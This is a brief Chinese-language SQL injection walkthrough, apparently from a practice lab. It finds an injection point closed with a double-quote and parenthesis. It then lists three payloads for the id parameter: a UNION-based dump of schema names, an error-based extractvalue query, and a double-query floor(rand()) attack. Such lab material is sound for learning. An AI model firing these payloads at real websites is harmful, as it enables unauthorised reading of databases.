方法一
找注入点;
输入id=1’ ,不报错
输入id=1" ,报错,报错信息如下;
从报错信息基本确定为(" “) 闭合语句。
找到注入点便可以进行注入。
?id=-1”) union select 1,2,group_concat(schema_name) from information_schema.schemata --+
方法二:报错注入
?id=-1") union select 1,2,extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1))) --+
方法三:双注入
?id=-1") union select 1,2,count(1) from information_schema.columns group by concat(floor(rand()*2),0x7e,(select schema_name from information_schema.schemata limit 0,1)) --+